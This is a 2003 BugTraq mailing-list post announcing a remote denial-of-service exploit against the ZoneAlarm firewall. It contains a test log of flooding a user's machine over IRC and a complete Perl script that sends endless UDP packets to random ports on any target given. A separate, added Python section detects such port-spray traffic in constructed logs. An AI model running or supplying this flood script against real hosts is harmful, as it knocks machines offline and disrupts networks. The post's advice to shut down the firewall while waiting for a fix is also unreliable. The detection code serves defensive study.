BugTraq
ZoneAlarm remote Denial Of Service exploit Sep 02 2003 02:57PM
_6mO_HaCk (hackologyteam yahoo com) (2 replies)


# Overview :
#
# ZoneAlarm is a firewall software
# package designed for Microsoft Windows
# operating systems that blocks intrusion
# attempts, trusted by millions, and has
# advanced privacy features like worms,
# Trojan horses, and spyware protection.
# ZoneAlarm is distributed and maintained
# by Zone Labs. http://www.zonelabs.com
#
# Details :
#
# ZoneAlarm was found vulnerable to a
# serious vulnerability leading to a
# remote Denial Of Service condition due
# to failure to handle udp random
# packets, if an attacker sends multiple
# udp packets to multiple ports 0-65000,
# the machine will hang up until the
# attacker stops flooding.
#
# The following is a remote test done
# under ZoneAlarm version 3.7.202 running
# on windows xp home edition.
#
# on irc test1 joined running ZoneAlarm
# version 3.7.202 with default
# installation
#
# * test1 (test@62.251.***.**) has joined #Hackology
#
# from a linux box :
#
# [root@mail DoS]# ping 62.251.***.**
# PING 62.251.***.** (62.251.***.**) from
# ***.***.**.** : 56(84) bytes of data.
#
# --- 62.251.***.** ping statistics ---
# 7 packets transmitted, 0 received, 100%
# loss, time 6017ms
#
# on irc
#
# -> [test1] PING
#
# [test1 PING reply]: 1secs
#
# Host is firewalled and up
#
# now let's try to dos
#
# --- ZoneAlarm Remote DoS Xploit
# ---
# --- Discovered & Coded By _6mO_HaCk
#
# [*] DoSing 62.251.***.** ... wait 1
# minute and then CTRL+C to stop
#
# [root@mail DoS]#
#
# after 2 minutes
#
# * test1 (test@62.251.***.**) Quit (Ping timeout)
#
# I have made the same test on ZoneAlarm
# Pro 4.0 Release running on windows xp
# professional and I've got the same
# result.
#
# Exploit released : 02/09/03
#
# Vulnerable Versions : ALL
#
# Operating Systems : ALL Windows
#
# Successfully Tested on :
#
# ZoneAlarm version 3.7.202 / windows xp
# home edition / windows 98.
#
# ZoneAlarm Pro 4.0 Release / windows xp
# professional
#
# Vendor status : UNKNOWN
#
# Solution : Shut down ZoneAlarm and wait
# for an update.
#
# The following is a simple code written
# in perl to demonstrate that, the code
# is clean, it won't eat your cpu usage
# and it doesn't need to be run as root
# but you still have to use it at your
# own risk and on your own machine or
# remotely after you get permission.
#
# Big thanx go to D|NOOO and frost for
# providing me windows boxes with
# zonealarm for testing
#
# Greetz to ir7ioli, BlooDMASK
# Abderrahman (at) zone-h (dot) org
# NRGY, Le_Ro| JT ghosted_ Securma,
# anasoft SySiPh, phrack, DeV|L0Ty,
# MajNouN |BiG-LuV| h4ckg1rl and all
# my ppl here in Chicago and in Morocco
#
# Comments suggestions or additional info
# feel free to contact me at
# simo (at) benyoussef (dot) org
# _6mO_HaCk (at) linuxmail (dot) org

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";

if(!defined($ARGV[0]))
{
    &usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve $target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
    $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
        $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
        $rand x $rand;
    $port=int(rand 65000) +1;
    send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}

sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}
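
Detection-side illustration of the traffic pattern described in the advisory (one source sending UDP datagrams to many different destination ports in a short time). This is an added example, not part of the original post: the log format, the addresses, the 1-second window and the 50-port threshold are all assumptions, and the sample log is constructed.

```python
from collections import defaultdict, deque

BASE = 1062514620.0  # constructed epoch timestamp for the sample data

def sample_log():
    """Constructed log lines in a hypothetical 'epoch proto src dst:dport' format."""
    lines = []
    for i in range(300):
        # 198.51.100.7: a different UDP port every 10 ms (the flood pattern)
        lines.append(f"{BASE + 0.01 * i:.3f} UDP 198.51.100.7 192.0.2.10:{i * 7919 % 65000 + 1}")
        # 203.0.113.5: equally busy, but always the same port (ordinary client)
        lines.append(f"{BASE + 0.01 * i + 0.005:.3f} UDP 203.0.113.5 192.0.2.10:53")
    for i in range(60):
        # 203.0.113.9: many different ports, but only one packet per second
        lines.append(f"{BASE + i:.3f} UDP 203.0.113.9 192.0.2.10:{2000 + i}")
    lines.append(f"{BASE + 0.2:.3f} TCP 203.0.113.5 192.0.2.10:80")
    return sorted(lines, key=lambda l: float(l.split()[0]))

def detect_udp_port_spray(lines, window=1.0, threshold=50):
    """Return {src: time} for sources that hit more than `threshold` distinct
    UDP destination ports within any `window`-second span."""
    recent = defaultdict(deque)  # src -> (time, dport) pairs still inside the window
    alerts = {}                  # src -> time the threshold was first crossed
    for line in lines:
        ts, proto, src, dst = line.split()
        if proto != "UDP":
            continue
        t, dport = float(ts), int(dst.rsplit(":", 1)[1])
        q = recent[src]
        q.append((t, dport))
        while t - q[0][0] > window:  # expire entries older than the window
            q.popleft()
        if src not in alerts and len({p for _, p in q}) > threshold:
            alerts[src] = t
    return alerts

if __name__ == "__main__":
    for src, t in detect_udp_port_spray(sample_log()).items():
        print(f"ALERT {src}: UDP port spray detected at t={t:.3f}")
```

Counting distinct ports rather than raw packets keeps the busy single-port client and the slow multi-port source below the threshold.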

Re: ZoneAlarm remote Denial Of Service exploit Sep 03 2003 01:46PM
Igor (sprog online ru)
Re: ZoneAlarm remote Denial Of Service exploit Sep 02 2003 09:51PM
gregh (chows ozemail com au)


 

Copyright 2010, SecurityFocus